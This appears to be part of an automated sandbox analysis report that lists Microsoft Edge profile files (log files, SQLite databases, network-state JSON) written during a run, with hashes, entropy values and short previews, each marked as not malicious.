                                                                                                                                                                                                                                                                                              Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.648152292571476
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:aj9P0vTQkQerkjlxP/KbtLc7gam6IThj773pLLRKToaAu:ad8Te2mlxP/NajF7NRKcC
                                                                                                                                                                                                                                                                                              MD5:AE7AC53BAA5544A786E4199B61372056
                                                                                                                                                                                                                                                                                              SHA1:53116E52A28E2675564A17635763D735EB8977C2
                                                                                                                                                                                                                                                                                              SHA-256:365E7A2B1E71E4E94D2C02E0A6F842DABB7B9163CD84F6681B477C99FEC9B9F7
                                                                                                                                                                                                                                                                                              SHA-512:D02AB18CE7D6A0BA228409AB446802998ED5B02AE76EA9DDD41A4A87C8671463AFBA68738FC0E2C36627E367E1D44EE960844825DC6593D2F4E0EBD19347B475
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):408
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.181852480621591
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:7Kxv4Yeb8rcHEZrELFUt8OKs/+OKM5LYeb8rcHEZrEZSJ:7K94Yeb8nZrExg8OK8KWLYeb8nZrEZe
                                                                                                                                                                                                                                                                                              MD5:9E3BA1598DD8E554E8B6A2D1BB374805
                                                                                                                                                                                                                                                                                              SHA1:7FBA0B9F0548049F27412F3D9BFEFB6FBF016EB1
                                                                                                                                                                                                                                                                                              SHA-256:922FBA3DC4D4287BA05841F96AB7F624CFC4700AE4BC40E0066FB1A1140985A7
                                                                                                                                                                                                                                                                                              SHA-512:6AFD100DE38D6C34E6061C011196469A49E7122E82991B731C1B91467B26F4DF323E714BF3C0A36EE87B75038EAA25BAED70ACFEB90C2D67B0E7340307EFDCEA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:23.004 1d08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/10-12:40:23.004 1d08 Recovering log #3.2024/12/10-12:40:23.004 1d08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):408
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.181852480621591
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:7Kxv4Yeb8rcHEZrELFUt8OKs/+OKM5LYeb8rcHEZrEZSJ:7K94Yeb8nZrExg8OK8KWLYeb8nZrEZe
                                                                                                                                                                                                                                                                                              MD5:9E3BA1598DD8E554E8B6A2D1BB374805
                                                                                                                                                                                                                                                                                              SHA1:7FBA0B9F0548049F27412F3D9BFEFB6FBF016EB1
                                                                                                                                                                                                                                                                                              SHA-256:922FBA3DC4D4287BA05841F96AB7F624CFC4700AE4BC40E0066FB1A1140985A7
                                                                                                                                                                                                                                                                                              SHA-512:6AFD100DE38D6C34E6061C011196469A49E7122E82991B731C1B91467B26F4DF323E714BF3C0A36EE87B75038EAA25BAED70ACFEB90C2D67B0E7340307EFDCEA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:23.004 1d08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/10-12:40:23.004 1d08 Recovering log #3.2024/12/10-12:40:23.004 1d08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0861566995503615
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L86RiOq2P923oH+Tcwt8a2jMGIFUt8OL86RwZmw+OL86RakwO923oH+Tcwt8a23:7AEv4Yeb8EFUt8OAj/+OAz5LYeb8bJ
                                                                                                                                                                                                                                                                                              MD5:DAD39F336A65E973DDFFF2D903E02921
                                                                                                                                                                                                                                                                                              SHA1:E63F69A8874B1EDC8E23E2CACF2FF778267DBAC6
                                                                                                                                                                                                                                                                                              SHA-256:3ADC449EE8A5409D6AA27D6BA39440C846765D51C8E7E2926B26D9BD1F6E11A2
                                                                                                                                                                                                                                                                                              SHA-512:AC1543BEF3D9FE5C02B6E909B6BDA0C58968FF0F9F0B91E8ED6D77B5CD1E0B1C4B397A1C2327E650FE933C9CB47D6AEEBF42DCA422189FB67BAEDDC59BFA1429
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.452 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:40:19.454 1e20 Recovering log #3.2024/12/10-12:40:19.456 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0861566995503615
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L86RiOq2P923oH+Tcwt8a2jMGIFUt8OL86RwZmw+OL86RakwO923oH+Tcwt8a23:7AEv4Yeb8EFUt8OAj/+OAz5LYeb8bJ
                                                                                                                                                                                                                                                                                              MD5:DAD39F336A65E973DDFFF2D903E02921
                                                                                                                                                                                                                                                                                              SHA1:E63F69A8874B1EDC8E23E2CACF2FF778267DBAC6
                                                                                                                                                                                                                                                                                              SHA-256:3ADC449EE8A5409D6AA27D6BA39440C846765D51C8E7E2926B26D9BD1F6E11A2
                                                                                                                                                                                                                                                                                              SHA-512:AC1543BEF3D9FE5C02B6E909B6BDA0C58968FF0F9F0B91E8ED6D77B5CD1E0B1C4B397A1C2327E650FE933C9CB47D6AEEBF42DCA422189FB67BAEDDC59BFA1429
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.452 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:40:19.454 1e20 Recovering log #3.2024/12/10-12:40:19.456 1e20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\327a352c-b493-46b5-a62d-89b3e50fcd57.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\4eb9993c-41a6-4d53-b52d-f3b748be956a.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\8cdd57f4-cf79-481c-94a1-7e6a75d95390.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\8e73a53c-8234-42f9-94ad-6af6dc3f6077.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.1370448132402866
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:TsKLopF+SawLUO1Xj8BWzRRUHgGnCCj3EVzCiAjiXN5VGL:te+AueRRgQCjLjids
                                                                                                                                                                                                                                                                                              MD5:47F34F13D0199AE8A4F80E594CB37E8F
                                                                                                                                                                                                                                                                                              SHA1:186016F9C5F6156D603CC382B93BB49C4111E24D
                                                                                                                                                                                                                                                                                              SHA-256:3A856870E7A9E543A6CF8BF78CCF007DCC1BE8260CF6DA0BB043B9D114FAEC10
                                                                                                                                                                                                                                                                                              SHA-512:3167399BE0102E290F274E18A7180A1BDACA3806CB65FBF63D812760297035D5BB57A87CAC335445606E1F9B8FB30ADF766F44920AB5B0BBA2AEEE7143C9D73B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1419
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                              MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                              SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                              SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                              SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF48c3e.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1419
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                              MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                              SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                              SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                              SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.7605739312418334
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBkE1:uIEumQv8m1ccnvS6h
                                                                                                                                                                                                                                                                                              MD5:2A255C02D56CDD1F27A6BB0D7FA1F756
                                                                                                                                                                                                                                                                                              SHA1:7F9303A70C6F3AABE92CCA9F6372593A40932A6B
                                                                                                                                                                                                                                                                                              SHA-256:30F7BF9757A20F2F4560A6486B237CD79F742E48686059FB56A1F43E0C9AEF09
                                                                                                                                                                                                                                                                                              SHA-512:A4F89CB3944DA4A96B83C27DEEF24B3B28E59CD79BEC8CCCF208F30056953E9B9C43FF6CF84BB85A356375C3A901F25DE76BEB0C9CE2351CED56E71029577C82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF37f24.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF38f70.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f2585493-0ac7-4fb4-a7fc-f3676928e5ea.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1419
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.341603258876039
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YcFGJ/I3RdsZ7MZVMdmRdsZcZFRudFGRRds4pZ6ma3yeesw6maPsw6C1MYhbxP7c:YcgCzsqtsufcKs4fleeBkBKYhbx9+
                                                                                                                                                                                                                                                                                              MD5:02C9983E008C9B156A5512A996389736
                                                                                                                                                                                                                                                                                              SHA1:481D02C0C1C7F5BB0AF92B2BD2B5BBBC47C01809
